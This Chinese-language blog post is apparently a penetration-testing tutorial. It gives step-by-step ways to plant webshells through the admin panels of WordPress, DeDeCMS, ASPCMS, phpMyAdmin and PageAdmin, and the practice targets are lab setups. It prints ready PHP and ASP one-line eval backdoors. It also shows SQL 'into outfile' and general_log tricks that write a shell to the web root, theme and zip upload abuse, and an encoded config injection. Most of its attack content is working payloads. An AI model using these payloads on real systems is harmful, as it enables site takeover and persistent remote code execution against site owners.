常见cms里面的几个cms框架的webshell方法(wordpress,dedecms,phpmyadmin,pageadmin)

WordPress

姿势一:

WordPress是一个以php和mysql为平台的自由开源的博客软件和内容管理系统。

靶场: vulhub/wordpress/pwnscriptum

复制代码
docker-compose up -d

步骤:再以登录的前提下,点外观,编辑下有多个php文件,比如404.php。

可以更新文件,将文件改成木马文件

复制代码
<?php eval@($_POST[cmd];)?>

然后可以找一个开源的网站着推出他的拼接路径

复制代码
/wp-content/themes/twentyfifteen/404.php

然后我们就可以使用webshell工具连接。

姿势二:

点击外观,主题可上传自定义主题。可以上网下载主题压缩包,将我们的木马文件拖入压缩包中,完成上传后,拼接路径即可用webshell工具连接

复制代码
/wp-content/themes/qzdy-master/1.php

DeDeCMS

是织梦团队开发PHP网站管理系统。

靶场; DedeCMS-V5.7.82-UTF8.zip

姿势一

搭建好靶场以后,登录到后台点击模块,有个文件式管理器,文件上传功能可以上传我们的木马文件。

姿势二

修改模块文件拿shell,找模块这里

姿势三

后台任意命令拿shell,打开模块,广告管理

内容改成一下内容

然后将提示的地址,拼接到网站路径下即可,用webshell工具连接

姿势四

通过后台执行sql语句拿shell

先查询一下数据库安装根目录

复制代码
select @@basedir

把输出的地址复制下来,拼接下面写入木马文件的路径。

复制代码
select ' <?php eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/www/1.php'

执行后用webshell工具练级即可

ASPCMS

ASPCMS是由上谷网络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 支持模版自定义、支持扩展插件等等,能够在短时间内完成企业建站。

点击 扩展功能,幻灯片设置,点击 【保存】开启代理进行抓包

改成这样

复制代码
%25><%25eval (request(chr(65)))%25><%25

PhPmyadmin

先下载一个phpmyadmin

该一下高版本的php,

姿势一

通过日志文件拿shell

查看mysql日志文件是否开启

复制代码
set global general_log='on'; 

打开变量搜索一下日志文件位置,然后点编辑,将他的日志文件路径改到www下,并把后缀改成php文件

日志文件是我们不管select什么它都会记录,那我们select木马语句

复制代码
select ' <?php eval($_POST[cmd]);?>'

让他把木马语句写到日志文件中

用webshell工具连接一下

姿势二,导入导出拿shell

这个就和刚才那个into outfile一模一样了

复制代码
select ' <?php eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/www/1.php'

直接写进去用webshell连接工具连接即可

Pageadmin

PageAdmin CMS系统是基于.Net的网站管理系统,安全、稳定、灵活,全国用户超过百万,致力于为 企业、学校、政府网站建设和网站制作提供企业级内容管理系统解决方案。

搭建的时候服务器地址要改一下

姿势一

上传模块拿shell,这个页面,直接上传asp的木马压缩文件,系统会直接解压

然后用webshell连接工具直接连接就好了(注意是免费版的就不要做了,上传插件需要权限)

姿势二

上传文件拿shell

功能菜单里有一个上传文件功能

asp的一句话木马如下,把它写到一个asp文件中然后压缩成zip文件上传即可

复制代码
<%25eval (request(chr(65)))%25>

上传成功后点一下解压

相关推荐
玖疯子7 天前
PyCharm高效入门指南大纲
java·运维·服务器·apache·wordpress
合天网安实验室24 天前
精准定位文件包含漏洞:代码审计中的实战思维
黑客·cms
skywalk81631 个月前
2025年的前后端一体化CMS框架优选方案
cms·web
Web极客码1 个月前
WordPress 站点漏洞利用:数据库恶意注入与多重感染的案例分析
数据库·wordpress·网站安全·数据库注入·wordpress漏洞·wordpress安全插件
wodrpress资源分享1 个月前
怎么让二级域名绑定到wordpesss指定的页面
wordpress
亿坊电商1 个月前
开源CMS vs 闭源CMS:二次开发究竟有何不同?
开源·cms
wodrpress资源分享1 个月前
WordPress用 Options Framework 创建一个自定义相册功能
wordpress
wodrpress资源分享1 个月前
经典风格的免费wordpress模板
wordpress
追逐时光者2 个月前
不写一行代码 .NET 使用 FluentCMS 快速构建现代化内容管理系统(CMS)
后端·.net·cms